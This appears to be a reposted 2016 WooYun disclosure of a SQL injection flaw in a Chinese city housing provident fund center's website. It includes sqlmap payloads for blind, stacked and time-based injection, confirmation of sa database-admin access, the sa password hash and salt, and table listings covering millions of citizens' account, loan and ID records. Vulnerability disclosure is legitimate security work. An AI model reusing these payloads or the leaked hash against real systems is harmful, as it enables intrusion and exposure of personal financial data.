记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

2016-05-20 19:30

某市住房公积金管理中心注入漏洞(SA),泄露700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)。。。

注入点:http://**.**.**.**/List/DownLoadCenterDetails?id=5EBC88CC-A248-41FD-9703-7FD6CC454628 用神器SQLMAP 跑了一下发现SA权限、、、直接可以跑出大量敏感的信息,包括公积金金额、居民身份证、名字、所在单位公司名字等等信息。。。

+-----------------------------------------+---------+

| Table | Entries |

+-----------------------------------------+---------+

| dbo.Fq_PersonAccountDetails | 7130445 |

| dbo.Fq_LoanDetails | 889789 |

| dbo.Fq_FundAccountsInfo | 580320 |

| dbo.Im_PFAccountContrast | 575657 |



code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' AND 9621=9621 AND 'EhJf'='

EhJf



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525'; WAITFOR DELAY '0:0:5'--



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' WAITFOR DELAY '0:0:5'--

---

[07:57:29] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2008

web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET

back-end DBMS: Microsoft SQL Server 2005

available databases [7]:

[*] AdventureWorks

[*] AdventureWorksDW

[*] GIOT_QZgjj

[*] master

[*] model

[*] msdb

[*] tempdb





current database: 'GIOT_QZgjj'



current user: 'sa'



database management system users password hashes:

[*] sa [1]:

password hash: 0x01004086ceb659f0af51ae621f0e86391ef163ba496c273d29ec

header: 0x0100

salt: 4086ceb6

mixedcase: 59f0af51ae621f0e86391ef163ba496c273d29ec



[09:10:38] [INFO] testing if current user is DBA

database management system users privileges:

[*] sa (administrator)





Database: GIOT_QZgjj

[88 tables]

+-------------------------------------+

| Bi_Company |

| Bi_CompanySort |

| Bi_Department |

| Bi_DicType |

| Bi_DicValue |

| Bi_EmployeeInfo |

| Bi_NotWorkDay |

| Bi_Position |

| Cp_OverviewManagement |

| Cp_ProvidentFundCard |

| Cs_LendingRates |

| Cs_LendingYearRates |

| Fq_AccountsSMS |

| Fq_CompanyAccountsInfo |

| Fq_CompanyAcountsInfoPro |

| Fq_FundAccountsInfo |

| Fq_FundAccountsInfoPro |

| Fq_LoanAccount |

| Fq_LoanAccountContrast_V |

| Fq_LoanAccountPro |

| Fq_LoanAccountProNew_V |

| Fq_LoanAccountProNo_V |

| Fq_LoanBank |

| Fq_LoanDetailSMS |

| Fq_LoanDetails |

| Fq_LoanDetailsPro |

| Fq_LoanHandleProgress |

| Fq_LoanHandleProgressPro |

| Fq_ManagementDept |

| Fq_PFPersonAccountProNo_V |

| Fq_PersonAccountDetails |

| Fq_PersonAccountDetailsPro |

| Fq_PersonAccountNew_V |

| Fq_WhichLinks |

| Ic_ComplaintsRights |

| Ic_ConsultingInteractive |

| Ic_ReplyQuestion |

| Im_AnnouncementPublicity |

| Im_CanGoodsProperty |

| Im_CategoryManagement |

| Im_CustomerInfo |

| Im_DownloadCenter |

| Im_Floatage |

| Im_FundCreditBlacklist |

| Im_GovernmentInformationDisclosure |

| Im_LawGuide |

| Im_Links |

| Im_PFAccountContrast |

| Im_PaymentHandlingProgressPublicity |

| Im_PoliciesRegulations |

| Im_RotationDiagram |

| Im_SearchKeywords |

| Im_SpecialTopic |

| Im_VerificationManage |

| Im_WorkDynamics |

| Pf_AccountContrast_V |

| Rs_HomeServiceReservationManage |

| Rs_ReservationManage |

| Rs_ReservationManageDepartment |

| Rs_ReservationNumberLimit |

| Rs_SMSTemplates |

| Sa_ControlInfo |

| Sa_LoginControl |

| Sa_ParameterConfiguration |

| Sa_Privilege_Company_Handle |

| Sa_UpdateLog |

| Sa_UserInfo |

| Sh_ComCustomerInfo |

| Sh_Persom |

| Sh_PersonChangePayListDetail |

| Sh_PersonFundChangeDetail |

| Sh_Settings |

| bo.Sh_PersonFundChange |

| sa_LogError |

| sa_LogHandle |

| sa_LogHandle_Report |

| sa_LogLoa |

| sa_LogLogin_Report |

| sa_Menu_Handle_Tree_View |

| sa_OnLiner |

| sa_Role_User |

| sa_Role_User_v |

| sa_handle_Guid |

| sa_menu_Guid |

| sa_privilege_Handle |

| sa_privilege_Handle_v |

| sa_role |

| sa_user_menu |

+-------------------------------------+



2.png



3.png



4.png



5.png





漏洞证明:

具体的跑出的数据如下:

code 区域
Database: GIOT_QZgjj

+-----------------------------------------+---------+

| Table | Entries |

+-----------------------------------------+---------+

| dbo.Fq_PersonAccountDetails | 7130445 |

| dbo.Fq_LoanDetails | 889789 |

| dbo.Fq_FundAccountsInfo | 580320 |

| dbo.Im_PFAccountContrast | 575657 |

| dbo.Im_VerificationManage | 273258 |

| dbo.Fq_AccountsSMS | 209707 |

| dbo.Pf_AccountContrast_V | 120413 |

| dbo.Fq_LoanHandleProgress | 97543 |

| dbo.Im_CustomerInfo | 63783 |

| dbo.Fq_LoanAccount | 60268 |

| dbo.Fq_LoanDetailSMS | 55956 |

| dbo.Fq_LoanAccountContrast_V | 22150 |

| dbo.Fq_LoanDetailsPro | 4200 |

| dbo.Ic_ConsultingInteractive | 1714 |

| dbo.Sa_LoginControl | 1160 |

| dbo.sa_OnLiner | 475 |

| dbo.sa_privilege_Handle | 438 |

| dbo.sa_privilege_Handle_v | 438 |

| dbo.Ic_ReplyQuestion | 330 |

| dbo.Im_SpecialTopic | 321 |

| dbo.sa_Menu_Handle_Tree_View | 287 |

| dbo.Im_WorkDynamics | 285 |

| dbo.sa_LogError | 252 |

| dbo.sa_handle_Guid | 202 |

| dbo.sa_LogHandle | 116 |

| dbo.Im_AnnouncementPublicity | 114 |

| dbo.Im_CanGoodsProperty | 105 |

| dbo.sa_menu_Guid | 85 |

| dbo.Ic_ComplaintsRights | 84 |

| dbo.Im_PoliciesRegulations | 74 |

| dbo.Im_CategoryManagement | 65 |

| dbo.Sh_Settings | 52 |

| dbo.Rs_ReservationManage | 50 |

| dbo.Im_LawGuide | 45 |

| dbo.Fq_LoanBank | 34 |

| dbo.Im_DownloadCenter | 25 |

| dbo.Im_GovernmentInformationDisclosure | 19 |

| dbo.Cp_ProvidentFundCard | 14 |

| dbo.Fq_ManagementDept | 13 |

| dbo.Im_PaymentHandlingProgressPublicity | 13 |

| dbo.sa_LogLogin_Report | 12 |

| dbo.Sa_UserInfo | 12 |

| dbo.Rs_HomeServiceReservationManage | 11 |

| dbo.Rs_ReservationManageDepartment | 11 |

| dbo.Bi_EmployeeInfo | 10 |

| dbo.Im_RotationDiagram | 10 |

| dbo.Rs_ReservationNumberLimit | 10 |

| dbo.sa_Role_User | 10 |

| dbo.sa_Role_User_v | 10 |

| dbo.Im_Links | 9 |

| dbo.Fq_WhichLinks | 8 |

| dbo.Rs_SMSTemplates | 7 |

| dbo.Sa_ControlInfo | 7 |

| dbo.Sa_Privilege_Company_Handle | 7 |

| dbo.Sa_ParameterConfiguration | 6 |

| dbo.Im_SearchKeywords | 4 |

| dbo.sa_LogHandle_Report | 4 |

| dbo.Bi_Company | 3 |

| dbo.Bi_Department | 3 |

| dbo.Bi_DicType | 3 |

| dbo.Bi_DicValue | 3 |

| dbo.Cp_OverviewManagement | 3 |

| dbo.Bi_CompanySort | 2 |

| dbo.Cs_LendingYearRates | 2 |

| dbo.sa_role | 2 |

| dbo.Sh_ComCustomerInfo | 2 |

| dbo.Sh_PersonChangePayListDetail | 2 |

| dbo.Bi_NotWorkDay | 1 |

| dbo.Cs_LendingRates | 1 |

| dbo.Im_Floatage | 1 |

+-----------------------------------------+---------+



5.png



6.png



7.png



修复方案:

过滤吧、、、


知识来源: www.wooyun.org/bugs/wooyun-2016-0191218

阅读:118746 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云